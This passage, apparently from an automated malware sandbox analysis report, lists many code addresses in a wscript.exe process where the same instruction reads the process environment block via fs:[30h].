Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05233D34 mov eax, dword ptr fs:[00000030h]	9_2_05233D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F8D34 mov eax, dword ptr fs:[00000030h]	9_2_052F8D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052AA537 mov eax, dword ptr fs:[00000030h]	9_2_052AA537
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05254D3B mov eax, dword ptr fs:[00000030h]	9_2_05254D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05254D3B mov eax, dword ptr fs:[00000030h]	9_2_05254D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05254D3B mov eax, dword ptr fs:[00000030h]	9_2_05254D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525513A mov eax, dword ptr fs:[00000030h]	9_2_0525513A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525513A mov eax, dword ptr fs:[00000030h]	9_2_0525513A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229100 mov eax, dword ptr fs:[00000030h]	9_2_05229100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229100 mov eax, dword ptr fs:[00000030h]	9_2_05229100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229100 mov eax, dword ptr fs:[00000030h]	9_2_05229100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522C962 mov eax, dword ptr fs:[00000030h]	9_2_0522C962
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522B171 mov eax, dword ptr fs:[00000030h]	9_2_0522B171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522B171 mov eax, dword ptr fs:[00000030h]	9_2_0522B171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524C577 mov eax, dword ptr fs:[00000030h]	9_2_0524C577
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524C577 mov eax, dword ptr fs:[00000030h]	9_2_0524C577
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524B944 mov eax, dword ptr fs:[00000030h]	9_2_0524B944
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524B944 mov eax, dword ptr fs:[00000030h]	9_2_0524B944
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05263D43 mov eax, dword ptr fs:[00000030h]	9_2_05263D43
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A3540 mov eax, dword ptr fs:[00000030h]	9_2_052A3540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05247D50 mov eax, dword ptr fs:[00000030h]	9_2_05247D50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F05AC mov eax, dword ptr fs:[00000030h]	9_2_052F05AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F05AC mov eax, dword ptr fs:[00000030h]	9_2_052F05AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052535A1 mov eax, dword ptr fs:[00000030h]	9_2_052535A1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052561A0 mov eax, dword ptr fs:[00000030h]	9_2_052561A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052561A0 mov eax, dword ptr fs:[00000030h]	9_2_052561A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A69A6 mov eax, dword ptr fs:[00000030h]	9_2_052A69A6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05251DB5 mov eax, dword ptr fs:[00000030h]	9_2_05251DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05251DB5 mov eax, dword ptr fs:[00000030h]	9_2_05251DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05251DB5 mov eax, dword ptr fs:[00000030h]	9_2_05251DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A51BE mov eax, dword ptr fs:[00000030h]	9_2_052A51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A51BE mov eax, dword ptr fs:[00000030h]	9_2_052A51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A51BE mov eax, dword ptr fs:[00000030h]	9_2_052A51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A51BE mov eax, dword ptr fs:[00000030h]	9_2_052A51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525A185 mov eax, dword ptr fs:[00000030h]	9_2_0525A185
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252581 mov eax, dword ptr fs:[00000030h]	9_2_05252581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252581 mov eax, dword ptr fs:[00000030h]	9_2_05252581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252581 mov eax, dword ptr fs:[00000030h]	9_2_05252581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252581 mov eax, dword ptr fs:[00000030h]	9_2_05252581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524C182 mov eax, dword ptr fs:[00000030h]	9_2_0524C182
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05222D8A mov eax, dword ptr fs:[00000030h]	9_2_05222D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05222D8A mov eax, dword ptr fs:[00000030h]	9_2_05222D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05222D8A mov eax, dword ptr fs:[00000030h]	9_2_05222D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05222D8A mov eax, dword ptr fs:[00000030h]	9_2_05222D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05222D8A mov eax, dword ptr fs:[00000030h]	9_2_05222D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252990 mov eax, dword ptr fs:[00000030h]	9_2_05252990
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525FD9B mov eax, dword ptr fs:[00000030h]	9_2_0525FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525FD9B mov eax, dword ptr fs:[00000030h]	9_2_0525FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0522B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0522B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0522B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052B41E8 mov eax, dword ptr fs:[00000030h]	9_2_052B41E8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0523D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0523D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052D8DF1 mov eax, dword ptr fs:[00000030h]	9_2_052D8DF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6DC9 mov eax, dword ptr fs:[00000030h]	9_2_052A6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6DC9 mov eax, dword ptr fs:[00000030h]	9_2_052A6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6DC9 mov eax, dword ptr fs:[00000030h]	9_2_052A6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6DC9 mov ecx, dword ptr fs:[00000030h]	9_2_052A6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6DC9 mov eax, dword ptr fs:[00000030h]	9_2_052A6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6DC9 mov eax, dword ptr fs:[00000030h]	9_2_052A6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525002D mov eax, dword ptr fs:[00000030h]	9_2_0525002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525002D mov eax, dword ptr fs:[00000030h]	9_2_0525002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525002D mov eax, dword ptr fs:[00000030h]	9_2_0525002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525002D mov eax, dword ptr fs:[00000030h]	9_2_0525002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525002D mov eax, dword ptr fs:[00000030h]	9_2_0525002D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523B02A mov eax, dword ptr fs:[00000030h]	9_2_0523B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523B02A mov eax, dword ptr fs:[00000030h]	9_2_0523B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523B02A mov eax, dword ptr fs:[00000030h]	9_2_0523B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523B02A mov eax, dword ptr fs:[00000030h]	9_2_0523B02A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525BC2C mov eax, dword ptr fs:[00000030h]	9_2_0525BC2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6C0A mov eax, dword ptr fs:[00000030h]	9_2_052A6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6C0A mov eax, dword ptr fs:[00000030h]	9_2_052A6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6C0A mov eax, dword ptr fs:[00000030h]	9_2_052A6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6C0A mov eax, dword ptr fs:[00000030h]	9_2_052A6C0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F740D mov eax, dword ptr fs:[00000030h]	9_2_052F740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F740D mov eax, dword ptr fs:[00000030h]	9_2_052F740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F740D mov eax, dword ptr fs:[00000030h]	9_2_052F740D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1C06 mov eax, dword ptr fs:[00000030h]	9_2_052E1C06
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F4015 mov eax, dword ptr fs:[00000030h]	9_2_052F4015
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F4015 mov eax, dword ptr fs:[00000030h]	9_2_052F4015
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A7016 mov eax, dword ptr fs:[00000030h]	9_2_052A7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A7016 mov eax, dword ptr fs:[00000030h]	9_2_052A7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A7016 mov eax, dword ptr fs:[00000030h]	9_2_052A7016
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524746D mov eax, dword ptr fs:[00000030h]	9_2_0524746D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F1074 mov eax, dword ptr fs:[00000030h]	9_2_052F1074
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E2073 mov eax, dword ptr fs:[00000030h]	9_2_052E2073
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525A44B mov eax, dword ptr fs:[00000030h]	9_2_0525A44B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05240050 mov eax, dword ptr fs:[00000030h]	9_2_05240050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05240050 mov eax, dword ptr fs:[00000030h]	9_2_05240050
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BC450 mov eax, dword ptr fs:[00000030h]	9_2_052BC450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BC450 mov eax, dword ptr fs:[00000030h]	9_2_052BC450
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0 mov eax, dword ptr fs:[00000030h]	9_2_052520A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0 mov eax, dword ptr fs:[00000030h]	9_2_052520A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0 mov eax, dword ptr fs:[00000030h]	9_2_052520A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0 mov eax, dword ptr fs:[00000030h]	9_2_052520A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0 mov eax, dword ptr fs:[00000030h]	9_2_052520A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052520A0 mov eax, dword ptr fs:[00000030h]	9_2_052520A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052690AF mov eax, dword ptr fs:[00000030h]	9_2_052690AF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525F0BF mov ecx, dword ptr fs:[00000030h]	9_2_0525F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525F0BF mov eax, dword ptr fs:[00000030h]	9_2_0525F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525F0BF mov eax, dword ptr fs:[00000030h]	9_2_0525F0BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229080 mov eax, dword ptr fs:[00000030h]	9_2_05229080
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A3884 mov eax, dword ptr fs:[00000030h]	9_2_052A3884
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A3884 mov eax, dword ptr fs:[00000030h]	9_2_052A3884
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523849B mov eax, dword ptr fs:[00000030h]	9_2_0523849B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052258EC mov eax, dword ptr fs:[00000030h]	9_2_052258EC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E14FB mov eax, dword ptr fs:[00000030h]	9_2_052E14FB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6CF0 mov eax, dword ptr fs:[00000030h]	9_2_052A6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6CF0 mov eax, dword ptr fs:[00000030h]	9_2_052A6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A6CF0 mov eax, dword ptr fs:[00000030h]	9_2_052A6CF0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F8CD6 mov eax, dword ptr fs:[00000030h]	9_2_052F8CD6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BB8D0 mov eax, dword ptr fs:[00000030h]	9_2_052BB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BB8D0 mov ecx, dword ptr fs:[00000030h]	9_2_052BB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BB8D0 mov eax, dword ptr fs:[00000030h]	9_2_052BB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BB8D0 mov eax, dword ptr fs:[00000030h]	9_2_052BB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BB8D0 mov eax, dword ptr fs:[00000030h]	9_2_052BB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BB8D0 mov eax, dword ptr fs:[00000030h]	9_2_052BB8D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05224F2E mov eax, dword ptr fs:[00000030h]	9_2_05224F2E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05224F2E mov eax, dword ptr fs:[00000030h]	9_2_05224F2E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525E730 mov eax, dword ptr fs:[00000030h]	9_2_0525E730
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F070D mov eax, dword ptr fs:[00000030h]	9_2_052F070D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F070D mov eax, dword ptr fs:[00000030h]	9_2_052F070D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525A70E mov eax, dword ptr fs:[00000030h]	9_2_0525A70E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525A70E mov eax, dword ptr fs:[00000030h]	9_2_0525A70E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524F716 mov eax, dword ptr fs:[00000030h]	9_2_0524F716
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E131B mov eax, dword ptr fs:[00000030h]	9_2_052E131B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BFF10 mov eax, dword ptr fs:[00000030h]	9_2_052BFF10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052BFF10 mov eax, dword ptr fs:[00000030h]	9_2_052BFF10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522DB60 mov ecx, dword ptr fs:[00000030h]	9_2_0522DB60
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523FF60 mov eax, dword ptr fs:[00000030h]	9_2_0523FF60
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F8F6A mov eax, dword ptr fs:[00000030h]	9_2_052F8F6A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05253B7A mov eax, dword ptr fs:[00000030h]	9_2_05253B7A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05253B7A mov eax, dword ptr fs:[00000030h]	9_2_05253B7A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522DB40 mov eax, dword ptr fs:[00000030h]	9_2_0522DB40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523EF40 mov eax, dword ptr fs:[00000030h]	9_2_0523EF40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F8B58 mov eax, dword ptr fs:[00000030h]	9_2_052F8B58
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522F358 mov eax, dword ptr fs:[00000030h]	9_2_0522F358
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05254BAD mov eax, dword ptr fs:[00000030h]	9_2_05254BAD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05254BAD mov eax, dword ptr fs:[00000030h]	9_2_05254BAD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05254BAD mov eax, dword ptr fs:[00000030h]	9_2_05254BAD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F5BA5 mov eax, dword ptr fs:[00000030h]	9_2_052F5BA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E138A mov eax, dword ptr fs:[00000030h]	9_2_052E138A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05231B8F mov eax, dword ptr fs:[00000030h]	9_2_05231B8F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05231B8F mov eax, dword ptr fs:[00000030h]	9_2_05231B8F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052DD380 mov ecx, dword ptr fs:[00000030h]	9_2_052DD380
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05252397 mov eax, dword ptr fs:[00000030h]	9_2_05252397
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525B390 mov eax, dword ptr fs:[00000030h]	9_2_0525B390
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05238794 mov eax, dword ptr fs:[00000030h]	9_2_05238794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A7794 mov eax, dword ptr fs:[00000030h]	9_2_052A7794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A7794 mov eax, dword ptr fs:[00000030h]	9_2_052A7794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A7794 mov eax, dword ptr fs:[00000030h]	9_2_052A7794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052503E2 mov eax, dword ptr fs:[00000030h]	9_2_052503E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052503E2 mov eax, dword ptr fs:[00000030h]	9_2_052503E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052503E2 mov eax, dword ptr fs:[00000030h]	9_2_052503E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052503E2 mov eax, dword ptr fs:[00000030h]	9_2_052503E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052503E2 mov eax, dword ptr fs:[00000030h]	9_2_052503E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052503E2 mov eax, dword ptr fs:[00000030h]	9_2_052503E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524DBE9 mov eax, dword ptr fs:[00000030h]	9_2_0524DBE9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052637F5 mov eax, dword ptr fs:[00000030h]	9_2_052637F5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A53CA mov eax, dword ptr fs:[00000030h]	9_2_052A53CA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052A53CA mov eax, dword ptr fs:[00000030h]	9_2_052A53CA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522E620 mov eax, dword ptr fs:[00000030h]	9_2_0522E620
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05264A2C mov eax, dword ptr fs:[00000030h]	9_2_05264A2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05264A2C mov eax, dword ptr fs:[00000030h]	9_2_05264A2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052DFE3F mov eax, dword ptr fs:[00000030h]	9_2_052DFE3F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522C600 mov eax, dword ptr fs:[00000030h]	9_2_0522C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522C600 mov eax, dword ptr fs:[00000030h]	9_2_0522C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522C600 mov eax, dword ptr fs:[00000030h]	9_2_0522C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05258E00 mov eax, dword ptr fs:[00000030h]	9_2_05258E00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052E1608 mov eax, dword ptr fs:[00000030h]	9_2_052E1608
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05238A0A mov eax, dword ptr fs:[00000030h]	9_2_05238A0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05225210 mov eax, dword ptr fs:[00000030h]	9_2_05225210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05225210 mov ecx, dword ptr fs:[00000030h]	9_2_05225210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05225210 mov eax, dword ptr fs:[00000030h]	9_2_05225210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05225210 mov eax, dword ptr fs:[00000030h]	9_2_05225210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522AA16 mov eax, dword ptr fs:[00000030h]	9_2_0522AA16
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0522AA16 mov eax, dword ptr fs:[00000030h]	9_2_0522AA16
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05243A1C mov eax, dword ptr fs:[00000030h]	9_2_05243A1C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525A61C mov eax, dword ptr fs:[00000030h]	9_2_0525A61C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0525A61C mov eax, dword ptr fs:[00000030h]	9_2_0525A61C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052DB260 mov eax, dword ptr fs:[00000030h]	9_2_052DB260
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052DB260 mov eax, dword ptr fs:[00000030h]	9_2_052DB260
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052F8A62 mov eax, dword ptr fs:[00000030h]	9_2_052F8A62
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0523766D mov eax, dword ptr fs:[00000030h]	9_2_0523766D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524AE73 mov eax, dword ptr fs:[00000030h]	9_2_0524AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524AE73 mov eax, dword ptr fs:[00000030h]	9_2_0524AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524AE73 mov eax, dword ptr fs:[00000030h]	9_2_0524AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524AE73 mov eax, dword ptr fs:[00000030h]	9_2_0524AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0524AE73 mov eax, dword ptr fs:[00000030h]	9_2_0524AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0526927A mov eax, dword ptr fs:[00000030h]	9_2_0526927A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229240 mov eax, dword ptr fs:[00000030h]	9_2_05229240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229240 mov eax, dword ptr fs:[00000030h]	9_2_05229240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229240 mov eax, dword ptr fs:[00000030h]	9_2_05229240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05229240 mov eax, dword ptr fs:[00000030h]	9_2_05229240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05237E41 mov eax, dword ptr fs:[00000030h]	9_2_05237E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05237E41 mov eax, dword ptr fs:[00000030h]	9_2_05237E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05237E41 mov eax, dword ptr fs:[00000030h]	9_2_05237E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05237E41 mov eax, dword ptr fs:[00000030h]	9_2_05237E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05237E41 mov eax, dword ptr fs:[00000030h]	9_2_05237E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_05237E41 mov eax, dword ptr fs:[00000030h]	9_2_05237E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052B4257 mov eax, dword ptr fs:[00000030h]	9_2_052B4257
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052252A5 mov eax, dword ptr fs:[00000030h]	9_2_052252A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_052252A5 mov eax, dword ptr fs:[00000030h]	9_2_052252A5
